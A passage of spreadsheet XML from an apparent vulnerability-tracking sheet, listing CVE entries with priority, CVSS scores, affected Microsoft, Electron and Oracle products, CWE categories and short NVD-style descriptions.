      <c r="I2730" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2730" s="5" t="inlineStr"/>
      <c r="K2730" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2730" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Deployment Services allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M2730" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69607</t>
        </is>
      </c>
    </row>
    <row r="2731">
      <c r="A2731" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2731" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69631</t>
        </is>
      </c>
      <c r="C2731" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2731" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2731" s="5" t="inlineStr"/>
      <c r="F2731" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G2731" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2731" s="5" t="inlineStr"/>
      <c r="I2731" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2731" s="5" t="inlineStr"/>
      <c r="K2731" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2731" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows DNS allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2731" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69631</t>
        </is>
      </c>
    </row>
    <row r="2732">
      <c r="A2732" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2732" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69710</t>
        </is>
      </c>
      <c r="C2732" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2732" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2732" s="5" t="inlineStr"/>
      <c r="F2732" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2732" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2732" s="5" t="inlineStr"/>
      <c r="I2732" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2732" s="5" t="inlineStr"/>
      <c r="K2732" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L2732" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2732" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69710</t>
        </is>
      </c>
    </row>
    <row r="2733">
      <c r="A2733" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2733" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69739</t>
        </is>
      </c>
      <c r="C2733" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2733" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2733" s="5" t="inlineStr"/>
      <c r="F2733" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G2733" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2733" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I2733" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2733" s="5" t="inlineStr"/>
      <c r="K2733" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2733" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M2733" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69739</t>
        </is>
      </c>
    </row>
    <row r="2734">
      <c r="A2734" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2734" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69744</t>
        </is>
      </c>
      <c r="C2734" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2734" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2734" s="5" t="inlineStr"/>
      <c r="F2734" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G2734" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2734" s="5" t="inlineStr"/>
      <c r="I2734" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2734" s="5" t="inlineStr"/>
      <c r="K2734" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L2734" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows Kerberos allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2734" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69744</t>
        </is>
      </c>
    </row>
    <row r="2735">
      <c r="A2735" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2735" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69760</t>
        </is>
      </c>
      <c r="C2735" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2735" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2735" s="5" t="inlineStr"/>
      <c r="F2735" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G2735" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2735" s="5" t="inlineStr"/>
      <c r="I2735" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2735" s="5" t="inlineStr"/>
      <c r="K2735" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2735" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Kerberos allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2735" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69760</t>
        </is>
      </c>
    </row>
    <row r="2736">
      <c r="A2736" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2736" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69793</t>
        </is>
      </c>
      <c r="C2736" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2736" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2736" s="5" t="inlineStr"/>
      <c r="F2736" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2736" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2736" s="5" t="inlineStr"/>
      <c r="I2736" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2736" s="5" t="inlineStr"/>
      <c r="K2736" s="5" t="inlineStr">
        <is>
          <t>CWE-1288</t>
        </is>
      </c>
      <c r="L2736" s="5" t="inlineStr">
        <is>
          <t>Improper validation of consistency within input in Windows TCP/IP allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="M2736" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69793</t>
        </is>
      </c>
    </row>
    <row r="2737">
      <c r="A2737" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2737" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69803</t>
        </is>
      </c>
      <c r="C2737" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2737" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2737" s="5" t="inlineStr"/>
      <c r="F2737" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2737" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2737" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I2737" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2737" s="5" t="inlineStr"/>
      <c r="K2737" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2737" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M2737" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69803</t>
        </is>
      </c>
    </row>
    <row r="2738">
      <c r="A2738" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2738" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69804</t>
        </is>
      </c>
      <c r="C2738" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2738" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2738" s="5" t="inlineStr"/>
      <c r="F2738" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2738" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2738" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I2738" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2738" s="5" t="inlineStr"/>
      <c r="K2738" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L2738" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="M2738" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69804</t>
        </is>
      </c>
    </row>
    <row r="2739">
      <c r="A2739" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2739" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69805</t>
        </is>
      </c>
      <c r="C2739" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2739" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2739" s="5" t="inlineStr"/>
      <c r="F2739" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2739" s="5" t="inlineStr">
        <is>
          <t>.net</t>
        </is>
      </c>
      <c r="H2739" s="5" t="inlineStr"/>
      <c r="I2739" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2739" s="5" t="inlineStr"/>
      <c r="K2739" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-522, CWE-73</t>
        </is>
      </c>
      <c r="L2739" s="5" t="inlineStr">
        <is>
          <t>External control of file name or path in .NET allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M2739" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69805</t>
        </is>
      </c>
    </row>
    <row r="2740">
      <c r="A2740" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2740" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69809</t>
        </is>
      </c>
      <c r="C2740" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2740" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2740" s="5" t="inlineStr"/>
      <c r="F2740" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G2740" s="5" t="inlineStr">
        <is>
          <t>active directory</t>
        </is>
      </c>
      <c r="H2740" s="5" t="inlineStr"/>
      <c r="I2740" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2740" s="5" t="inlineStr"/>
      <c r="K2740" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="L2740" s="5" t="inlineStr">
        <is>
          <t>Missing release of memory after effective lifetime in Active Directory Domain Services allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2740" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69809</t>
        </is>
      </c>
    </row>
    <row r="2741">
      <c r="A2741" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2741" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69852</t>
        </is>
      </c>
      <c r="C2741" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2741" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2741" s="5" t="inlineStr"/>
      <c r="F2741" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2741" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2741" s="5" t="inlineStr"/>
      <c r="I2741" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2741" s="5" t="inlineStr"/>
      <c r="K2741" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2741" s="5" t="inlineStr">
        <is>
          <t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t>
        </is>
      </c>
      <c r="M2741" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69852</t>
        </is>
      </c>
    </row>
    <row r="2742">
      <c r="A2742" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2742" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69881</t>
        </is>
      </c>
      <c r="C2742" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2742" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2742" s="5" t="inlineStr"/>
      <c r="F2742" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G2742" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2742" s="5" t="inlineStr"/>
      <c r="I2742" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2742" s="5" t="inlineStr"/>
      <c r="K2742" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L2742" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows IKE Extension allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2742" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69881</t>
        </is>
      </c>
    </row>
    <row r="2743">
      <c r="A2743" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2743" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69890</t>
        </is>
      </c>
      <c r="C2743" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2743" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2743" s="5" t="inlineStr"/>
      <c r="F2743" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2743" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2743" s="5" t="inlineStr"/>
      <c r="I2743" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2743" s="5" t="inlineStr"/>
      <c r="K2743" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2743" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Virtual Trusted Platform Module allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2743" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69890</t>
        </is>
      </c>
    </row>
    <row r="2744">
      <c r="A2744" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2744" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69929</t>
        </is>
      </c>
      <c r="C2744" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2744" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2744" s="5" t="inlineStr"/>
      <c r="F2744" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2744" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2744" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I2744" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2744" s="5" t="inlineStr"/>
      <c r="K2744" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2744" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M2744" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69929</t>
        </is>
      </c>
    </row>
    <row r="2745">
      <c r="A2745" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2745" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69930</t>
        </is>
      </c>
      <c r="C2745" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2745" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2745" s="5" t="inlineStr"/>
      <c r="F2745" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2745" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2745" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I2745" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2745" s="5" t="inlineStr"/>
      <c r="K2745" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2745" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M2745" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69930</t>
        </is>
      </c>
    </row>
    <row r="2746">
      <c r="A2746" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2746" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70065</t>
        </is>
      </c>
      <c r="C2746" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2746" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2746" s="5" t="inlineStr"/>
      <c r="F2746" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G2746" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2746" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I2746" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2746" s="5" t="inlineStr"/>
      <c r="K2746" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="L2746" s="5" t="inlineStr">
        <is>
          <t>Missing release of memory after effective lifetime in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2746" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70065</t>
        </is>
      </c>
    </row>
    <row r="2747">
      <c r="A2747" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2747" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70124</t>
        </is>
      </c>
      <c r="C2747" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2747" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2747" s="5" t="inlineStr"/>
      <c r="F2747" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2747" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2747" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I2747" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2747" s="5" t="inlineStr"/>
      <c r="K2747" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2747" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M2747" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70124</t>
        </is>
      </c>
    </row>
    <row r="2748">
      <c r="A2748" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2748" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70570</t>
        </is>
      </c>
      <c r="C2748" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2748" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2748" s="5" t="inlineStr"/>
      <c r="F2748" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2748" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2748" s="5" t="inlineStr"/>
      <c r="I2748" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2748" s="5" t="inlineStr"/>
      <c r="K2748" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2748" s="5" t="inlineStr">
        <is>
          <t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t>
        </is>
      </c>
      <c r="M2748" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70570</t>
        </is>
      </c>
    </row>
    <row r="2749">
      <c r="A2749" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2749" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70579</t>
        </is>
      </c>
      <c r="C2749" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2749" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2749" s="5" t="inlineStr"/>
      <c r="F2749" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G2749" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2749" s="5" t="inlineStr"/>
      <c r="I2749" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2749" s="5" t="inlineStr"/>
      <c r="K2749" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2749" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Mobile Broadband allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M2749" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70579</t>
        </is>
      </c>
    </row>
    <row r="2750">
      <c r="A2750" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2750" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70587</t>
        </is>
      </c>
      <c r="C2750" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2750" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2750" s="5" t="inlineStr"/>
      <c r="F2750" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2750" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2750" s="5" t="inlineStr"/>
      <c r="I2750" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2750" s="5" t="inlineStr"/>
      <c r="K2750" s="5" t="inlineStr">
        <is>
          <t>CWE-170</t>
        </is>
      </c>
      <c r="L2750" s="5" t="inlineStr">
        <is>
          <t>Improper null termination in Windows Remote Desktop Protocol allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M2750" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70587</t>
        </is>
      </c>
    </row>
    <row r="2751">
      <c r="A2751" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2751" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70601</t>
        </is>
      </c>
      <c r="C2751" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2751" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2751" s="5" t="inlineStr"/>
      <c r="F2751" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2751" s="5" t="inlineStr">
        <is>
          <t>windows, java, node.js</t>
        </is>
      </c>
      <c r="H2751" s="5" t="inlineStr"/>
      <c r="I2751" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J2751" s="5" t="inlineStr"/>
      <c r="K2751" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L2751" s="5" t="inlineStr">
        <is>
          <t>Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.9, 40.9.2, 41.2.2, and 42.0.0-beta.5, apps that expose Promise-returning functions to web content via contextBridge may be vulnerable to a context isolation bypass. Untrusted web content could obtain access to the isolated preload world and, through it, every capability the preload script has. In renderers without a sandbox, or with nodeIntegration enabled, this may escalate to Node.js access. Apps are affected if they expose Promise-returning functions via contextBridge, the standard pattern for wrapping ipcRenderer.invoke, in windows that load untrusted content. This issue is fixed in versions 39.8.9, 40.9.2, 41.2.2, and 42.0.0-beta.5.</t>
        </is>
      </c>
      <c r="M2751" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70601</t>
        </is>
      </c>
    </row>
    <row r="2752">
      <c r="A2752" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2752" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71092</t>
        </is>
      </c>
      <c r="C2752" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2752" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2752" s="5" t="inlineStr"/>
      <c r="F2752" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2752" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H2752" s="5" t="inlineStr">
        <is>
          <t>oracle:peoplesoft_lease_administration</t>
        </is>
      </c>
      <c r="I2752" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2752" s="5" t="inlineStr"/>
      <c r="K2752" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L2752" s="5" t="inlineStr">
        <is>
